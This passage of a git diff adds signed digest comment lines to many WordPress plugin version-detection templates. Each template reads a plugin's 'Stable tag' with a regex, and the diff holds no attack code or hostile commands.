+46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100f8a48b862fe2b7f7aae83317795f2ea8da86010d796754d3a4a4231964ce99b5022100be33c87423f82c58f3abd60ee80d45ed32130095427fe50f6d43ef0cde22e073:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml index 7aac0a153f..f3689a53eb 100644 --- a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml +++ b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022028ea3ca280c8592263e2b63da7b3cc5725d704daabf6c602db02a9d178543e6e022100bfd8d2bedc8267e396e9a7263455d7b687d7b6f1409780b1e95d5b5551d30704:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sg-cachepress.yaml b/http/technologies/wordpress/plugins/sg-cachepress.yaml index d0cebd5316..cf3d24bd1e 100644 --- a/http/technologies/wordpress/plugins/sg-cachepress.yaml +++ b/http/technologies/wordpress/plugins/sg-cachepress.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402203ad9bf7f984fc73503aad2082ffe9213e39ce56f3d619f877f9ab3b83c2da87e0220149d7f296032f5ebeadf09c0eedf72d582d7a54b03c9df9278171a1c827f698a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sg-security.yaml b/http/technologies/wordpress/plugins/sg-security.yaml index ff20779157..066ce18907 100644 --- a/http/technologies/wordpress/plugins/sg-security.yaml +++ b/http/technologies/wordpress/plugins/sg-security.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a0048304602210097d1b9c3e43313a59ff2c8bfd3ff0994f26493be69a6be036dcb3a648a33f808022100ad6beae48f5f64fa72bfb2745bfa7606b948b4e69f20d78986b76c634678070f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml index fffdc7d017..b16781c870 100644 --- a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml +++ b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502204aebb46f56b3e988a3247456b501bccd13439c4b3ea2d4f6365064f12ce22fe1022100e5e147eafeabcfc2fe92036ceaf35e7fa67536d23e45540e6b9e361906889472:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml index 7a9746a70d..6b89dcde97 100644 --- a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml +++ b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100d88c7cf7a3c4563169795782757232f9ac0d888843d25ffc1df66eb093cbbfc6022100c5d50acef038cc937ce1cf3bc40143b1327d0b9c25a63f06c2a363d8276e27bb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml index 3fe86debf5..e44667b3c3 100644 --- a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221009c6aabc3adc23eb4dcc1bc16c3a67dba7b753acb11f7d518b369e83a35ce04940220641f5ed6fc1ffcfe7312d328ccb3ffb86588a32c6869dbafdb591d852ba4d649:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/simple-history.yaml b/http/technologies/wordpress/plugins/simple-history.yaml index 18a7437e94..371b4aea36 100644 --- a/http/technologies/wordpress/plugins/simple-history.yaml +++ b/http/technologies/wordpress/plugins/simple-history.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220724275a589e65778e5dd4c82b2107d99251cdfd12fdc5c9ded548bd0ca515a020220098f1fed9459b43db91c450562ebedcb40c098c4799d6c124b2519a4d224ce40:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/siteguard.yaml b/http/technologies/wordpress/plugins/siteguard.yaml index 3deac58709..f25e4bc4e8 100644 --- a/http/technologies/wordpress/plugins/siteguard.yaml +++ b/http/technologies/wordpress/plugins/siteguard.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022000f6ad2eac1e770943c5abfc1eef05af0c4a1e0685b7c8d8b1e1a5a7ed14838a0220084da4da8c9fd7b895a198c9292f48bbc89f5fee7174f41dd1266271736477e9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/siteorigin-panels.yaml b/http/technologies/wordpress/plugins/siteorigin-panels.yaml index e7e7c27682..dd8d1eb29f 100644 --- a/http/technologies/wordpress/plugins/siteorigin-panels.yaml +++ b/http/technologies/wordpress/plugins/siteorigin-panels.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100c233c7a4e4ca5d396de3b44c65b3604859cf6745001c143bf93b6f7ddccdb93b022100a2e0d6a445dcf6651055c00549f5ee5993f0311c400a3de363c6e67de4eb2930:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/smart-slider-3.yaml b/http/technologies/wordpress/plugins/smart-slider-3.yaml index ad4ebefa4b..0fdffbb687 100644 --- a/http/technologies/wordpress/plugins/smart-slider-3.yaml +++ b/http/technologies/wordpress/plugins/smart-slider-3.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a004830460221008b5cdccff967a76e8ae65d775f5a6f051d158a00d4678b6863fdb208b86329f9022100d4424d2d4242cd050b367f53442305cb04c7d4c47ee4e9ea38c4f54dac70c5b7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml index 8e88c81c0a..931f052264 100644 --- a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml +++ b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100c08a7106357e3f211e6c241e209c3c8f574f38c59973411764ead2bfc4efea1402210089b8cae4cd1fe40d9a94a70a8ea895ce2303b0445564babd96156d8cc12d1a74:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml b/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml index 39d269fb85..4096e5c394 100644 --- a/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100ece6615c9fae38243d7e20aab07bf9d5bcbfb209ebdb10d19c40021ef0c3db2d02204bb9bc2b2d28e8d6e061c807148e0f8de2e7905d24493cc9d9856cf9539d0bee:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml index fc126d83c6..f4df9d33dd 100644 --- a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml +++ b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220310009c5490ffe55626c3fc439209c3f84633eaa1ad710d8f0530b8b9b53ba70022100f014ac766ec26d52ffc2c98d176ede07df2c3fb8e1a5b4fcb674c71ae035b86a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sucuri-scanner.yaml b/http/technologies/wordpress/plugins/sucuri-scanner.yaml index 8c49a34259..6467d329ee 100644 --- a/http/technologies/wordpress/plugins/sucuri-scanner.yaml +++ b/http/technologies/wordpress/plugins/sucuri-scanner.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100a533699e5b39cbd3a97b5cffb70d1dcd755fea39467ded8a9655cd1166737ae7022100ba4feb3cd5e0a586088f278847ce97800f417cfb49a341b2ded06a2031732278:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/svg-support.yaml b/http/technologies/wordpress/plugins/svg-support.yaml index c20ed6552a..e4935f453b 100644 --- a/http/technologies/wordpress/plugins/svg-support.yaml +++ b/http/technologies/wordpress/plugins/svg-support.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502203f3b28c6c29359a37167fb4cd505e7dfa8f9303f4a4bc86d2dfb019ae70bb687022100c8ec56aefde5ab5f13f1e3bea44128b40f045dadf938c2ffd92b560b66470259:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml index 6ac2212b4b..64667ddef0 100644 --- a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml +++ b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402203affe6ac6e11f65790fc2ae4e08fb85daba6a18a49fb5ad9b41864b5316e097c02201d744c5e807338fc76242436b7f9f253e64f4f6e56a495fc2101c910cbb98d5f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/tablepress.yaml b/http/technologies/wordpress/plugins/tablepress.yaml index 71c71b5ed1..1064e8165c 100644 --- a/http/technologies/wordpress/plugins/tablepress.yaml +++ b/http/technologies/wordpress/plugins/tablepress.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100f4b9d967c2cf997a7f7b8ac6fb34558dd18b8ab754edda24483d24f25b000ba70220478adaa8e18de09394785287b5dd9ca023be9cc88a070f2dd7f1001909d73df5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml index 7b47adc274..ea7e68d1e8 100644 --- a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml +++ b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022031542ebd84deeae114b1b99a72027d5ab542fa3574749cbbdd8fbbe7b71d3d3c022044384037c3d92f12cafc3fd41408f1456369dd135fd9fb44bfffb62db0c50ed7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/templately.yaml b/http/technologies/wordpress/plugins/templately.yaml index 38391bd9f3..f795c5517e 100644 --- a/http/technologies/wordpress/plugins/templately.yaml +++ b/http/technologies/wordpress/plugins/templately.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100f3e26c5c2b78297b0dc87798a41501ebf079e4f9b844933b171604df1c98b0cd022038880338669a35abab48b7e3ecdff174dbede614cb89fda81ea304ea85f258be:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/the-events-calendar.yaml b/http/technologies/wordpress/plugins/the-events-calendar.yaml index c4928059f6..bb0ac1dd43 100644 --- a/http/technologies/wordpress/plugins/the-events-calendar.yaml +++ b/http/technologies/wordpress/plugins/the-events-calendar.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100aaa8e6bbf651dc8ab964da0562172b333419f4a0bb81ad89341fa3baf07eb08d0220554c338da25b59479d47fdd6f5b1a7054e3996b87fd1b854a25cc957ba115162:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/tinymce-advanced.yaml b/http/technologies/wordpress/plugins/tinymce-advanced.yaml index f6a7836f35..393f58f783 100644 --- a/http/technologies/wordpress/plugins/tinymce-advanced.yaml +++ b/http/technologies/wordpress/plugins/tinymce-advanced.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100e4994aee944d44a0966f6053facad5270d54b69f4dfb30b64eff506cef292ce1022100e972fb96a5ceb47b5d91e7113e3def91c1b641f9fb5d5b39ff55917d4833cc12:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml index b7af708c4f..8f3ae71586 100644 --- a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml +++ b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100aa83d322dca4e74dcdfedd8b1bcb3a8f6cca54ec1fc7e4763eff9b6b6ded8bd6022048835295235ae69a586715475df52a4775eccef1d09f62b696a4ac20fdaa461d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml index 61a793edf7..9ab39d533d 100644 --- a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100e694920d48c29d2044cc529b29e74bdd71ea6726bd42c2c0ecf494c0385d611b022009186832666a2ab17f256abf84991a09c77d3bbb62a6793de3220e53eba01bca:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/under-construction-page.yaml b/http/technologies/wordpress/plugins/under-construction-page.yaml index 0da88d5d3f..7254f3b63e 100644 --- a/http/technologies/wordpress/plugins/under-construction-page.yaml +++ b/http/technologies/wordpress/plugins/under-construction-page.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100f7fd755fe10e2100291b34ae55555a59ced1733fdb8825b573af8689815bff5d022100f1f34662915fd88ad1434f127ed8e6a80c246cccb5ff0d1d52fb4f2ac684813c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/updraftplus.yaml b/http/technologies/wordpress/plugins/updraftplus.yaml index 3e1e79e004..fd90161fca 100644 --- a/http/technologies/wordpress/plugins/updraftplus.yaml +++ b/http/technologies/wordpress/plugins/updraftplus.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100c4e9098c3ba8c5fc5f7d9150fe2dcc3bc4c24d618e61fa315059351951c2fd3b022100fa261e8bd27039855e9f4fdd4287eca7f8c42b890ccda598004addc5facc557f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/user-role-editor.yaml b/http/technologies/wordpress/plugins/user-role-editor.yaml index 181e619a7c..d5705714fa 100644 --- a/http/technologies/wordpress/plugins/user-role-editor.yaml +++ b/http/technologies/wordpress/plugins/user-role-editor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220792c2d2a73395a6f2c899d8de47fdc89fb1ac533cd89f6f6f50fecf4757d499002202043cc6994761676baf90ae665eb97e17dcbc05269062f47c5653cf481acdbbf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/w3-total-cache.yaml b/http/technologies/wordpress/plugins/w3-total-cache.yaml index 8164eb4483..30cc2d3803 100644 --- a/http/technologies/wordpress/plugins/w3-total-cache.yaml +++ b/http/technologies/wordpress/plugins/w3-total-cache.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100d418773853eb59839bbbfdc10252feab61191b3a20cb3b9eef7c97ff1da73352022100ab64852c3c7f747df06d19f6a95d7d579dc73cb3b460752c19904d4071008c8f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml index 59554defdf..fcbec0a472 100644 --- a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml +++ b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502206f5ef0c97476bd4599bb75d7837e264a962b429525e1e9af0dda711b1fe9d08f022100ca53bdedbba02ed5014e01353ecb795c25fca71178c842988d100c7b4c9f1d50:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/webp-express.yaml b/http/technologies/wordpress/plugins/webp-express.yaml index 350fd9436b..8de459e515 100644 --- a/http/technologies/wordpress/plugins/webp-express.yaml +++ b/http/technologies/wordpress/plugins/webp-express.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022052b0b4f8cd19d8cd9881b9416db25698e3115b5bc40f7312bbd608f8071f52d602205b449b43974c2b52e7aa755c62db0160dbb088b3acc842ac98825ec68ae39440:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml index 2ae6bafbba..dfbaf3df98 100644 --- a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml +++ b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100e94ec671f3be7dc66f817ca3b6517a9d2a2913d4edc532974eb039183a584f0e0221009ab6fef14fb3b99fb9ddacdf6bc91269b4a0258dce7d1d16e72450f81776ac49:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml index d0dc8d92bb..2ccfe02523 100644 --- a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml +++ b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100ac0e2ce1f8036a422c805e48b7685f89da0b8da19d53d569ab33e1320855aca402206b77f9147656cc4e1b6d5a6245e81cc5f3e94931e4fb602244397d6d0836075b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml index c49bbc2b6d..5105d3b59e 100644 --- a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml +++ b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402202fffcabbf31cf86028e3892d63c4e624758aae6f789a118fcb173f74290c6b0802206c9c04dce79b981a0a3cf2e5bf22155b1666e94ef128fa9ac5a6e0a99b8917d1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml index 27586cbd9d..d7b160e1d2 100644 --- a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml +++ b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100eda87c68428c4730928e3b3f67617f246da5387e017057bae61d7b1a359b1f27022040561671e865d1e18ddccdd1bdb7bdf90c9ef6961d6431dcdcf8dfbd631ea7ee:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml index 946272f0a9..a70e0d2c32 100644 --- a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502204078623b07e84e2d7737464f4074d1b3350bf8c9f26e98a72fa4ef7418ca60bd02210082dac51e4e0b757a12e24205fd93cbfc2648bd5e97be520676af22743fcdbccb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml b/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml index aa29706872..8c9d46d0c5 100644 --- a/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100e03559eb364da112eb07fbf08609d707fc45cc26264af0e10ded79b309927964022100ed54b2f29d10aa359012ef6138dc275827fd1e1b986c8c49a366762ca413091a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-payments.yaml index 290d53ab7e..6464a44844 100644 --- a/http/technologies/wordpress/plugins/woocommerce-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-payments.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402202a9aa51c5d8f72d0112ecc858a63e35c650096f6e11061152b251163a79b2efe0220692ccdb42c6c4a03b3935822b6859f2d4d331354c04924dcf3adbbc63fe165b0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml index e83e8d79e7..fbaadbaf77 100644 --- a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402204124b3bab9b63e0c432c92478122dcc695554f19ee9062162b0abcd964347e5a0220298c6dfbd0ba857f0a14dc4bbbbca08e1f96194367b7e531c4c7920c7cfecb29:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml index f1c16275a2..a75b151044 100644 --- a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100e96dbaaa6779a8027f24517e2bf5d8da1c21cc5c9dfcfc3ef26a0762bb4e9b45022100c6d9d87c2fc5da5d504b69f7913fd68d4aa3c98d41ef67c613a404d58b767cdc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-services.yaml b/http/technologies/wordpress/plugins/woocommerce-services.yaml index fc072e19d8..8453a304e5 100644 --- a/http/technologies/wordpress/plugins/woocommerce-services.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-services.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a0048304602210098fc16fb22ce49d200718cb966cad6ce4fbbdcc9b11e08b14ac91415c33583de022100dc70ab0efa9a5075969f3b84080221a13aaea2e0e6c35d7dec3e27ad593bb2f5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce.yaml b/http/technologies/wordpress/plugins/woocommerce.yaml index da9df0e8a5..fbe13775dc 100644 --- a/http/technologies/wordpress/plugins/woocommerce.yaml +++ b/http/technologies/wordpress/plugins/woocommerce.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100a8176a475e85cb58ccc56189f6c150025fa1772dfaa8ab77bc5eeb85f9e618220221009ab36c3ec3f36d540abb41283dea69b4b5140a11a9da639b1da7d9c99c1a6d4b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordfence.yaml b/http/technologies/wordpress/plugins/wordfence.yaml index f8113d9750..6b09e1409a 100644 --- a/http/technologies/wordpress/plugins/wordfence.yaml +++ b/http/technologies/wordpress/plugins/wordfence.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100da72544c9efcf3e2d734eba357fc6fa239de3f9aaad8ae0a87bb44b6240d046d0220008c5d11cedfb04bef45457a730fec63a5c6bd870ae625c6a359ee59470100fc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordpress-importer.yaml b/http/technologies/wordpress/plugins/wordpress-importer.yaml index 5f80282ab2..08ec515eae 100644 --- a/http/technologies/wordpress/plugins/wordpress-importer.yaml +++ b/http/technologies/wordpress/plugins/wordpress-importer.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022050bc88361fa4105d91c39b0731ced0371f9dcf26d6e917eccad226952ba8272c0221008ac6da9df93ccf23b0d23e40a15e5df52ac640c2c9fadf09d8b339d9eeb80905:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordpress-seo.yaml b/http/technologies/wordpress/plugins/wordpress-seo.yaml index 5725d5bb3f..ed393cdcb6 100644 --- a/http/technologies/wordpress/plugins/wordpress-seo.yaml +++ b/http/technologies/wordpress/plugins/wordpress-seo.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220034377b80de8e4f047c450efb7a01af620e072440f89ee597a788e786c60ec8b02206867fb020c1c47db7afb1b9d896166834367879deee99c5ddf5dc4b02578b389:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/worker.yaml b/http/technologies/wordpress/plugins/worker.yaml index f67a8bc18a..932685fbbe 100644 --- a/http/technologies/wordpress/plugins/worker.yaml +++ b/http/technologies/wordpress/plugins/worker.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100fdff1432f21aedc12cc4bb3e3a78d2ae09fc9cb73e4d68183c40e051e54c1aee0220574cd157179f7ffa5b5ed57c0c2b160adceb46f23d3c76a399288dcf7f996b52:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml index b9bd4be0a8..5a3167e662 100644 --- a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402207a00aeb4a778ac9c3cc4e71ec0fe5c6168a6f3ee9c01d6a317a32464215c413602203d096d21e2d6de616cf0d5e4b79a592c77e12f32c704df95e7134518752f9f8d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-file-manager.yaml b/http/technologies/wordpress/plugins/wp-file-manager.yaml index bece4ce486..5a44fbd83b 100644 --- a/http/technologies/wordpress/plugins/wp-file-manager.yaml +++ b/http/technologies/wordpress/plugins/wp-file-manager.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 